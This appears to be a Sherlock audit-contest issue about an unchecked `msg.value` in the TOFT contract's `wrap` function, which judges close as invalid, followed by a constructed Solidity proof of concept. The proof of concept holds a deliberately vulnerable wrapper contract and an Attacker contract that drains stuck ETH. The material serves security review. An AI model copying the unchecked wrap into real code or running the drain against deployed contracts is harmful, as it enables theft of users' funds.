Closed. sherlock-admin2 closed 4 months ago.
Low/Invalid. The contract is not supposed to hold funds (TOFTVault is responsible for that). `rescueEth` is added just in case we need to save airdropped funds.
1 comment was left on this issue during the judging contest.
WangAudit commented:
As I understand it, tokens shouldn't be there (therefore there is a rescue function (not claim) in case anyone accidentally sends tokens there; basically a user mistake).
Invalid: token contracts are not supposed to hold funds; any accidental funds sent would be a user mistake, which is not accepted under the Sherlock rules:
- Users sending ETH/native tokens accidentally just because a contract allows it is not a valid medium/high.
duc
medium
Unclaimed native tokens in TOFT contract can be stolen
Summary
See vulnerability detail
Vulnerability Detail
The TOFT contract has a function to rescue native tokens stuck in the contract. However, the `wrap` function doesn't check that `msg.value` is equal to `_amount`. Therefore, an attacker can call `wrap` with `msg.value` of 0 and `_amount` equal to the ETH balance of the contract to steal the native tokens already held by the contract.
Impact
Unclaimed native tokens in TOFT contract will be stolen
Code Snippet
https://github.com/sherlock-audit/2024-02-tapioca/blob/main/Tapioca-bar/contracts/markets/Market.sol#L419-L422
Tool used
Manual Review
Recommendation
Should check that `msg.value` is equal to `_amount` in the case of wrapping native tokens:
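A constructed Solidity illustration of the attack path and the recommended check described in this issue. It is added here and is not the TOFT contract or any Tapioca code; the contract names NativeWrapper and Attacker, the constructor flag, and the function signatures of wrap, unwrap and rescueEth are assumptions that mirror the pattern the issue describes.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Constructed example, not Tapioca's TOFT contract. The names and
// signatures below are assumptions that mirror the pattern in the issue.
contract NativeWrapper {
    mapping(address => uint256) public balanceOf;
    address public immutable owner;
    // true  = the recommended msg.value == _amount check is enforced
    // false = the vulnerable behaviour described in the issue
    bool public immutable checksValue;

    constructor(bool _checksValue) {
        owner = msg.sender;
        checksValue = _checksValue;
    }

    // Stray ETH (airdrops, mistaken sends) lands here; rescueEth exists to save it.
    receive() external payable {}

    // Credits _amount of wrapped balance. Without the check, msg.value and
    // _amount are unrelated, so a caller can be credited for ETH the
    // contract already holds.
    function wrap(address _toAddress, uint256 _amount) external payable {
        if (checksValue) {
            require(msg.value == _amount, "wrap: msg.value != _amount");
        }
        balanceOf[_toAddress] += _amount;
    }

    // Burns wrapped balance and pays out native tokens from the contract.
    function unwrap(address _toAddress, uint256 _amount) external {
        balanceOf[msg.sender] -= _amount; // reverts on underflow (0.8.x checked math)
        (bool ok, ) = _toAddress.call{value: _amount}("");
        require(ok, "unwrap: transfer failed");
    }

    // Owner-only recovery of native tokens stuck in the contract.
    function rescueEth(uint256 _amount, address _to) external {
        require(msg.sender == owner, "rescueEth: not owner");
        (bool ok, ) = _to.call{value: _amount}("");
        require(ok, "rescueEth: transfer failed");
    }
}

// The two-call sequence from the issue: wrap with msg.value == 0 for the
// whole stuck balance, then unwrap it. Succeeds against NativeWrapper(false)
// and reverts on the require in NativeWrapper(true).
contract Attacker {
    function steal(NativeWrapper target) external {
        uint256 stuck = address(target).balance;
        target.wrap(address(this), stuck);   // no {value: ...}, so msg.value is 0
        target.unwrap(address(this), stuck); // drains the ETH that was already there
    }

    // Receives the drained ETH.
    receive() external payable {}
}
```

To reproduce, deploy NativeWrapper(false), send it some ETH directly, then call Attacker.steal with its address: the Attacker contract ends up holding the previously stuck ETH. Against NativeWrapper(true) the same call reverts at the msg.value check, so stuck ETH can only leave through rescueEth. As the judges note, the exploit has nothing to take unless the contract holds ETH it was never designed to hold.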